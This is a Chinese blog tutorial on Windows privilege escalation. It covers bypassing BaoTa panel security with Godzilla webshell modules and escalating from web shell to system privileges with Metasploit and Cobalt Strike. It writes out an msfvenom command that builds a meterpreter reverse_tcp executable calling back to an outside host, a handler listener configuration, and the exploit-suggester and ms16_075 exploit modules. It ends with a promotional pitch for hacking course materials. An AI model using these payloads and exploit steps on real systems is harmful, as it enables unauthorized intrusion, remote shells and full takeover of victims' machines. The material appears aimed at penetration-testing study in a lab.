权限提升-Windows权限提升篇&溢出漏洞&宝塔面板Bypass&CS插件化&MSF模块化

ASP/ASP.NET/PHP/JSP等
权限高低:JSP>ASP.NET>ASP=PHP


### 3、系统用户权限差异


#### Windows



System:系统组,拥有管理系统资源的权限,包括文件、目录和注册表等。
Administrators:管理员组,具有对计算机进行完全访问和操作的权限。
Users:用户组,一般用户的默认组别,拥有较低的系统权限。
Guests:访客组,可以访问计算机上的公共文件夹和打印机,但不能更改配置和安装程序。
Backup Operators:备份操作员组,允许用户备份和还原数据,但不能更改配置安装程序。
Power Users:高级用户组,拥有比一般用户更高的系统权限,但比管理员组权限低。
Remote Desktop Users:远程桌面用户组,允许用户进行远程桌面连接。
Network Configuration Operators:网络配置操作员组,允许用户管理网络配置。
Performance Log Users:性能日志用户组,允许用户收集性能日志和计数器数据。
Distributed COM Users:分布式 COM 用户组,允许用户使用分布式 COM 连接到计算机。
IIS_IUSRS: 用于授权IIS相关服务的用户组。


#### Linux



系统用户:UID(0-999)
普通用户:UID(1000-*)
root用户:UID为0,拥有系统的完全控制权限


## 二、演示案例-Web到Win-系统提权-宝塔安全策略绕过-哥斯拉


### 集成软件搭建+Windows 2012(宝塔Apache+PHP)-宝塔安全策略绕过


![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/223ab2b307af4d569753a8afad6a124c.png)  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/9ffc609a1d0f48a7a044d53ca6f50c97.png)  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/b224c44ac58d40cf9ea1fbc39b7a16c3.png)


#### 哥斯拉模块-PMeterpreter(反弹shell到msf)


![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/745a6c64b55044bd93c7f5f6adcdb54e.png)  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/48e716e38f96415e80b7fe11e6b1beb5.png)


#### 哥斯拉模块-BypassOpenBaseDir(绕过目录限制)


![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/97ed9d3680ab471c8faa6b84f43acb00.png)  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/f6ec4aa4d8764946b94b50afeb3df6ef.png)


#### 哥斯拉模块-BypassDisableFunction(绕过命令限制)


![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/9ff2f26b96b94cd493e5f3cc004f8a3d.png)


## 三、演示案例-Web到Win-系统提权-溢出漏洞-MSF&CS


### 自行搭建+Windows 2008(IIS+ASP)+MSF


![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/2577c4ea15b74532b07cf205cac532cc.png)


#### 0、MSF安装


目前的msf版本有社区版,可以TB上购买pro版本嘎嘎稳  
 <https://blog.csdn.net/qq_46717339/article/details/122653084>


#### 1、生成反弹后门



msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.139.141 LPORT=3333 -f exe -o msf.exe


![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/06036478c43e4f9993244b863117d6f0.png)  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/d4df2ad716e24c449d0a2d8c543105ed.png)


#### 2、配置监听会话



use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 3333
run


![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/922c4b202dcf4c74b89a1d74f8fbb657.png)  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/d15c4d9f2ece42a78a8003180f1c77be.png)


#### 3、筛选EXP模块



background


![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/4b11fe5ea6b94ad5b03a93e678090aeb.png)  
 全自动:快速识别系统中可能被利用的漏洞



use post/multi/recon/local_exploit_suggester
set showdescription true
set session x


![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/c057f1630d6b49ca81cac7a3ad6d072e.png)  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/c465008812744763b9c7cedb12dfc7ce.png)  
 4、利用EXP溢出提权



use exploit/windows/local/ms16_075_reflection_juicy
set session 1
run


![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/af398baa17bc4362957eee2e0d3e16d0.png)


### 自行搭建+Windows 2016(IIS+ASP.NET)+CS


![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/0e1226ee968c4cb49e4ece78e20372df.png)  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/771c804d3c004cde94655eb188ef210b.png)


#### 0、服务端启动CS



./teamserver IP password


#### 1、本地客户端连接CS


![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/b1b0c018be2f44f280c14888e6bc9ed0.png)


#### 2、创建监听器


![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/75fa3c791f714c899acf269e3f60e10c.png)  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/7c61d210e75642798b8372cc7ab69802.png)  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/74a5dfd91cf84a008554ca3e5faf2ba9.png)


#### 3、生成CS木马并上线


![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/6f347a1da5fa4395bf5321c2f366cd03.png)  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/752a9da556924645af8a64d97724df2a.png)  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/36ed5c9f56ac466e8a75bdf695852c45.png)  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/54591ce2fb58419db2588370483b1242.png)  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/f6254a1b0978411bb9a7e08c8486ddb4.png)


#### 4、加载脚本插件


![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/41b8243346dd40e1a1453e762894d88f.png)  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/c9a99407bef14360b6e8f08a6fbc1755.png)  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/ba3fef1cd24a44e2938329d6a7ac600b.png)  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/6fa21a0f76fe49289286ecf87f074a27.png)  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/19b29e95e6b34addae064d4a32c470af.png)  


### 给大家的福利


**零基础入门**


对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。


![](https://img-blog.csdnimg.cn/img_convert/95608e9062782d28f4f04f821405d99a.png)


同时每个成长路线对应的板块都有配套的视频提供:


![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/a91b9e8100834e9291cfcf1695d8cd42.png#pic_center)


因篇幅有限,仅展示部分资料


网络安全面试题


![](https://img-blog.csdnimg.cn/img_convert/80674985176a4889f7bb130756893764.png)


绿盟护网行动


![](https://img-blog.csdnimg.cn/img_convert/9f3395407120bb0e1b5bf17bb6b6c743.png)


还有大家最喜欢的黑客技术


![](https://img-blog.csdnimg.cn/img_convert/5912337446dee53639406fead3d3f03c.jpeg)


**网络安全源码合集+工具包**


![](https://img-blog.csdnimg.cn/img_convert/5072ce807750c7ec721c2501c29cb7d5.png)


![](https://img-blog.csdnimg.cn/img_convert/4a5f4281817dc4613353c120c9543810.png)

**所有资料共282G**,朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》,可以扫描下方二维码领取(如遇扫码问题,可以在评论区留言领取哦)~




**网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。**

**[需要这份系统化资料的朋友,可以点击这里获取](https://bbs.csdn.net/topics/618540462)**


**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**

  • 5
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值